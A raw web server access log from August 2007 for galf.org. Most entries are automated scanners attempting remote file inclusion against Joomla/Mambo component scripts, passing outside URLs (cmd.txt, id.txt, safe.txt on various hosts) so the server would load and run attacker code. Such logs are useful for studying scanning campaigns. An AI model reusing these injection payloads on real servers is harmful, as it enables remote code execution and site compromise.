70.87.77.50 - - [26/Aug/2007:13:36:26 -0700] "GET /logs/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://afltech.host.sk/alat/hajar.htm? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.87.77.50 - - [26/Aug/2007:13:36:26 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://afltech.host.sk/alat/hajar.htm? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:13:37:39 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://abc.someshit.ru//base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.154.236.33 - - [26/Aug/2007:13:40:01 -0700] "GET /labia/ HTTP/1.1" 200 524 "http://www.google.co.uk/search?hl=en&q=intitle%3Aindex.of+%22labia%22&btnG=Google+Search&meta=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "galf.org"
81.154.236.33 - - [26/Aug/2007:13:40:02 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "galf.org"
81.154.236.33 - - [26/Aug/2007:13:40:05 -0700] "GET / HTTP/1.1" 200 1048 "http://galf.org/labia/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "galf.org"
81.154.236.33 - - [26/Aug/2007:13:40:09 -0700] "GET /labia/ HTTP/1.1" 200 524 "http://galf.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" "galf.org"
74.6.25.205 - - [26/Aug/2007:13:43:27 -0700] "GET /logs/access_070716.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
193.205.80.54 - - [26/Aug/2007:13:45:29 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.205.80.54 - - [26/Aug/2007:13:45:29 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.205.80.54 - - [26/Aug/2007:13:45:30 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
83.18.159.125 - - [26/Aug/2007:13:46:00 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:13:46:00 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://abc.someshit.ru/base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:13:46:47 -0700] "GET /index.php?id=http://abc.someshit.ru//base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.18.159.125 - - [26/Aug/2007:13:46:47 -0700] "GET /logs/index.php?id=http://abc.someshit.ru//base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
219.84.99.91 - - [26/Aug/2007:13:47:30 -0700] "GET //modules/4nalbum/public/displaycategory.php?basepath=http://serc.ilc.edu.tw/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
219.84.99.91 - - [26/Aug/2007:13:47:30 -0700] "GET //modules/4nalbum/public/displaycategory.php?basepath=http://serc.ilc.edu.tw/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
71.61.210.165 - - [26/Aug/2007:13:48:58 -0700] "GET /labia/ HTTP/1.1" 200 524 "http://www.google.com/search?q=labia&hl=en&rls=GGLD,GGLD:2004-35,GGLD:en&start=120&sa=N" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.3); .NET CLR 1.0.3705)" "galf.org"
71.61.210.165 - - [26/Aug/2007:13:48:58 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.3); .NET CLR 1.0.3705)" "galf.org"
83.18.159.125 - - [26/Aug/2007:13:50:02 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://abc.someshit.ru//base? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.194.149.56 - - [26/Aug/2007:13:50:34 -0700] "GET /logs/access_070806.log//components/com_flyspray/startdown.php?file=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.194.149.56 - - [26/Aug/2007:13:50:35 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.194.149.56 - - [26/Aug/2007:13:50:35 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.53.47.66 - - [26/Aug/2007:13:50:39 -0700] "GET /logs/access_070716.log/index.php?pagina=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.47.66 - - [26/Aug/2007:13:50:39 -0700] "GET /index.php?pagina=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.47.66 - - [26/Aug/2007:13:50:39 -0700] "GET /logs/index.php?pagina=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
213.194.149.56 - - [26/Aug/2007:13:50:44 -0700] "GET /logs/access_070806.log//components/com_flyspray/startdown.php?file=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.194.149.56 - - [26/Aug/2007:13:50:44 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.194.149.56 - - [26/Aug/2007:13:50:44 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
213.194.149.56 - - [26/Aug/2007:13:51:01 -0700] "GET /logs/access_070813.log//components/com_flyspray/startdown.php?file=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
128.121.78.221 - - [26/Aug/2007:13:51:42 -0700] "GET /logs/access_070716.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
128.121.78.221 - - [26/Aug/2007:13:51:42 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
128.121.78.221 - - [26/Aug/2007:13:51:42 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.57.105.181 - - [26/Aug/2007:13:52:01 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
128.121.78.221 - - [26/Aug/2007:13:52:06 -0700] "GET /logs/access_070806.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.205.80.54 - - [26/Aug/2007:13:53:28 -0700] "GET /logs/access_070813.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.241.213.244 - - [26/Aug/2007:13:53:47 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.244 - - [26/Aug/2007:13:53:49 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
122.153.62.163 - - [26/Aug/2007:13:55:37 -0700] "GET /logs/access_070618.log//modules/4nalbum/public/displaycategory.php?basepath=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
122.153.62.163 - - [26/Aug/2007:13:55:37 -0700] "GET /logs//modules/4nalbum/public/displaycategory.php?basepath=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.249.73.202 - - [26/Aug/2007:13:55:51 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
128.121.78.221 - - [26/Aug/2007:13:56:40 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.244.166.76 - - [26/Aug/2007:13:58:24 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.244.166.76 - - [26/Aug/2007:13:58:25 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.28.18.238 - - [26/Aug/2007:14:00:23 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.28.18.238 - - [26/Aug/2007:14:00:27 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.75.204.106 - - [26/Aug/2007:14:01:34 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fredericlucalandi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.75.204.106 - - [26/Aug/2007:14:01:34 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fredericlucalandi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.75.204.106 - - [26/Aug/2007:14:01:34 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.75.204.106 - - [26/Aug/2007:14:01:34 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:14:03:10 -0700] "GET /logs/access_070716.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://71.102.93.10/WTS/bin/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:14:03:10 -0700] "GET /logs/access_070716.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.garrettloftusauctioneers.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:14:03:10 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://71.102.93.10/WTS/bin/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:14:03:10 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.garrettloftusauctioneers.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:14:03:10 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://71.102.93.10/WTS/bin/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:14:03:10 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.garrettloftusauctioneers.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.195.40.3 - - [26/Aug/2007:14:03:41 -0700] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.195.40.3 - - [26/Aug/2007:14:03:41 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.195.40.3 - - [26/Aug/2007:14:03:41 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.195.40.3 - - [26/Aug/2007:14:03:43 -0700] "GET /logs/access_070604.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.31.122.242 - - [26/Aug/2007:14:04:35 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.garrettloftusauctioneers.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:14:04:36 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.garrettloftusauctioneers.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:14:04:36 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.garrettloftusauctioneers.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:14:04:38 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://71.102.93.10/WTS/bin/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:14:04:39 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://71.102.93.10/WTS/bin/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.122.242 - - [26/Aug/2007:14:04:39 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://71.102.93.10/WTS/bin/hak/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.2.247.210 - - [26/Aug/2007:14:05:09 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
62.2.247.210 - - [26/Aug/2007:14:05:09 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.247.210 - - [26/Aug/2007:14:05:10 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.247.210 - - [26/Aug/2007:14:05:10 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.247.210 - - [26/Aug/2007:14:05:10 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.2.247.210 - - [26/Aug/2007:14:05:10 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.225.239.55 - - [26/Aug/2007:14:06:11 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.227.63.202 - - [26/Aug/2007:14:06:56 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://truck.ucoz.ru/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.227.63.202 - - [26/Aug/2007:14:06:56 -0700] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://truck.ucoz.ru/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
74.6.25.227 - - [26/Aug/2007:14:07:24 -0700] "GET /cendoc/?M=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
84.191.122.51 - - [26/Aug/2007:14:07:30 -0700] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.191.122.51 - - [26/Aug/2007:14:07:31 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.191.122.51 - - [26/Aug/2007:14:07:31 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.191.122.51 - - [26/Aug/2007:14:07:44 -0700] "GET /logs/access_070604.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.186 - - [26/Aug/2007:14:07:57 -0700] "GET /logs/access_070716.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.186 - - [26/Aug/2007:14:07:57 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.241.213.186 - - [26/Aug/2007:14:07:59 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.186 - - [26/Aug/2007:14:09:03 -0700] "GET /logs/access_070618.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.172.32.44 - - [26/Aug/2007:14:11:29 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.172.32.44 - - [26/Aug/2007:14:11:29 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.172.32.44 - - [26/Aug/2007:14:11:29 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.172.32.44 - - [26/Aug/2007:14:11:29 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.74.1.19 - - [26/Aug/2007:14:11:31 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
206.74.1.19 - - [26/Aug/2007:14:11:31 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
206.74.1.19 - - [26/Aug/2007:14:11:31 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
206.74.1.19 - - [26/Aug/2007:14:11:31 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
74.53.47.66 - - [26/Aug/2007:14:12:00 -0700] "GET /logs/access_070716.log/index.php?pagina=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.47.66 - - [26/Aug/2007:14:12:00 -0700] "GET /index.php?pagina=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.47.66 - - [26/Aug/2007:14:12:00 -0700] "GET /logs/index.php?pagina=http://badmus.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.118.86.55 - - [26/Aug/2007:14:12:46 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
64.118.86.55 - - [26/Aug/2007:14:12:46 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.118.86.55 - - [26/Aug/2007:14:12:46 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.118.86.55 - - [26/Aug/2007:14:12:46 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.227.63.202 - - [26/Aug/2007:14:13:35 -0700] "GET /logs/access_070806.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://truck.ucoz.ru/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
87.204.82.4 - - [26/Aug/2007:14:15:20 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
87.204.82.4 - - [26/Aug/2007:14:15:20 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
87.204.82.4 - - [26/Aug/2007:14:15:20 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
87.204.82.4 - - [26/Aug/2007:14:15:20 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
66.246.252.43 - - [26/Aug/2007:14:17:20 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.246.252.43 - - [26/Aug/2007:14:17:20 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.246.252.43 - - [26/Aug/2007:14:17:20 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.246.252.43 - - [26/Aug/2007:14:17:20 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.75.204.106 - - [26/Aug/2007:14:17:29 -0700] "GET /logs/access_070813.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.fredericlucalandi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
